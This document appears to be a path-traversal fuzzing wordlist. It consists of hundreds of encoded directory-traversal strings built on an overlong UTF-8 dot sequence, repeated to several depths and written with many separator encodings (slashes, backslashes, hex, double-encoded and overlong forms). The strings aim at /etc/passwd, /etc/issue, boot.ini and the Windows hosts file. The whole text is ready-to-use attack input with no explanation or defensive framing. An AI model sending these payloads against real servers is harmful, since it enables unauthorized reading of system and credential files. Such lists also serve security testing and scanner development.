-%c0%5e%c0%5e\windows\system32\drivers\etc\hosts -%c0%5e%c0%5e\%c0%5e%c0%5e\etc\passwd -%c0%5e%c0%5e\%c0%5e%c0%5e\etc\issue -%c0%5e%c0%5e\%c0%5e%c0%5e\boot.ini -%c0%5e%c0%5e\%c0%5e%c0%5e\windows\system32\drivers\etc\hosts -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\etc\passwd -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\etc\issue -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\boot.ini -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\windows\system32\drivers\etc\hosts -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\etc\passwd -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\etc\issue -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\boot.ini -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\windows\system32\drivers\etc\hosts -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\etc\passwd -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\etc\issue -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\boot.ini -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\windows\system32\drivers\etc\hosts -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\etc\passwd -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\etc\issue -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\boot.ini -%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\%c0%5e%c0%5e\windows\system32\drivers\etc\hosts -%c0%5e%c0%5e%2fetc%2fpasswd -%c0%5e%c0%5e%2fetc%2fissue -%c0%5e%c0%5e%2fboot.ini -%c0%5e%c0%5e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fetc%2fpasswd -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fetc%2fissue -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fboot.ini -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fetc%2fpasswd -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fetc%2fissue -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fboot.ini -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fetc%2fpasswd -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fetc%2fissue -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fboot.ini -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fetc%2fpasswd -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fetc%2fissue -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fboot.ini -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fetc%2fpasswd -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fetc%2fissue -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fboot.ini -%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2f%c0%5e%c0%5e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%c0%5e%c0%5e%5cetc%5cpasswd -%c0%5e%c0%5e%5cetc%5cissue -%c0%5e%c0%5e%5cboot.ini -%c0%5e%c0%5e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cetc%5cpasswd -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cetc%5cissue -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cboot.ini -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cetc%5cpasswd -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cetc%5cissue -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cboot.ini -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cetc%5cpasswd -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cetc%5cissue -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cboot.ini -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cetc%5cpasswd -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cetc%5cissue -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cboot.ini -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cetc%5cpasswd -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cetc%5cissue -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cboot.ini -%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5c%c0%5e%c0%5e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%c0%5e%c0%5e0x2fetc0x2fpasswd -%c0%5e%c0%5e0x2fetc0x2fissue -%c0%5e%c0%5e0x2fboot.ini -%c0%5e%c0%5e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fetc0x2fpasswd -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fetc0x2fissue -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fboot.ini -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fetc0x2fpasswd -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fetc0x2fissue -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fboot.ini -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fetc0x2fpasswd -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fetc0x2fissue -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fboot.ini -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fetc0x2fpasswd -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fetc0x2fissue -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fboot.ini -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fetc0x2fpasswd -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fetc0x2fissue -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fboot.ini -%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2f%c0%5e%c0%5e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%c0%5e%c0%5e0x5cetc0x5cpasswd -%c0%5e%c0%5e0x5cetc0x5cissue -%c0%5e%c0%5e0x5cboot.ini -%c0%5e%c0%5e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cetc0x5cpasswd -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cetc0x5cissue -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cboot.ini -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cetc0x5cpasswd -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cetc0x5cissue -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cboot.ini -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cetc0x5cpasswd -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cetc0x5cissue -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cboot.ini -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cetc0x5cpasswd -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cetc0x5cissue -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cboot.ini -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cetc0x5cpasswd -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cetc0x5cissue -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cboot.ini -%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5c%c0%5e%c0%5e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%c0%5e%c0%5e%252fetc%252fpasswd -%c0%5e%c0%5e%252fetc%252fissue -%c0%5e%c0%5e%252fboot.ini -%c0%5e%c0%5e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fetc%252fpasswd -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fetc%252fissue -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fboot.ini -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fetc%252fpasswd -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fetc%252fissue -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fboot.ini -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fetc%252fpasswd -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fetc%252fissue -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fboot.ini -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fetc%252fpasswd -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fetc%252fissue -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fboot.ini -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fetc%252fpasswd -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fetc%252fissue -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fboot.ini -%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252f%c0%5e%c0%5e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%c0%5e%c0%5e%255cetc%255cpasswd -%c0%5e%c0%5e%255cetc%255cissue -%c0%5e%c0%5e%255cboot.ini -%c0%5e%c0%5e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cetc%255cpasswd -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cetc%255cissue -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cboot.ini -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cetc%255cpasswd -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cetc%255cissue -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cboot.ini -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cetc%255cpasswd -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cetc%255cissue -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cboot.ini -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cetc%255cpasswd -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cetc%255cissue -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cboot.ini -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cetc%255cpasswd -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cetc%255cissue -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cboot.ini -%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255c%c0%5e%c0%5e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%c0%5e%c0%5e%c0%2fetc%c0%2fpasswd -%c0%5e%c0%5e%c0%2fetc%c0%2fissue -%c0%5e%c0%5e%c0%2fboot.ini -%c0%5e%c0%5e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fetc%c0%2fpasswd -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fetc%c0%2fissue -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fboot.ini -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fetc%c0%2fpasswd -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fetc%c0%2fissue -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fboot.ini -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fetc%c0%2fpasswd -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fetc%c0%2fissue -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fboot.ini -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fetc%c0%2fpasswd -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fetc%c0%2fissue -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fboot.ini -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fetc%c0%2fpasswd -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fetc%c0%2fissue -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fboot.ini -%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2f%c0%5e%c0%5e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%c0%5e%c0%5e%c0%afetc%c0%afpasswd -%c0%5e%c0%5e%c0%afetc%c0%afissue -%c0%5e%c0%5e%c0%afboot.ini -%c0%5e%c0%5e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afetc%c0%afpasswd -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afetc%c0%afissue -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afboot.ini -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afetc%c0%afpasswd -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afetc%c0%afissue -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afboot.ini -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afetc%c0%afpasswd -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afetc%c0%afissue -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afboot.ini -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afetc%c0%afpasswd -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afetc%c0%afissue -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afboot.ini -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afetc%c0%afpasswd -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afetc%c0%afissue -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afboot.ini -%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%af%c0%5e%c0%5e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%c0%5e%c0%5e%c0%5cetc%c0%5cpasswd -%c0%5e%c0%5e%c0%5cetc%c0%5cissue -%c0%5e%c0%5e%c0%5cboot.ini -%c0%5e%c0%5e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cetc%c0%5cpasswd -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cetc%c0%5cissue -%c0%5e%c0%5e%c0%5c%c0%5e%c0%5e%c0%5cboot.ini 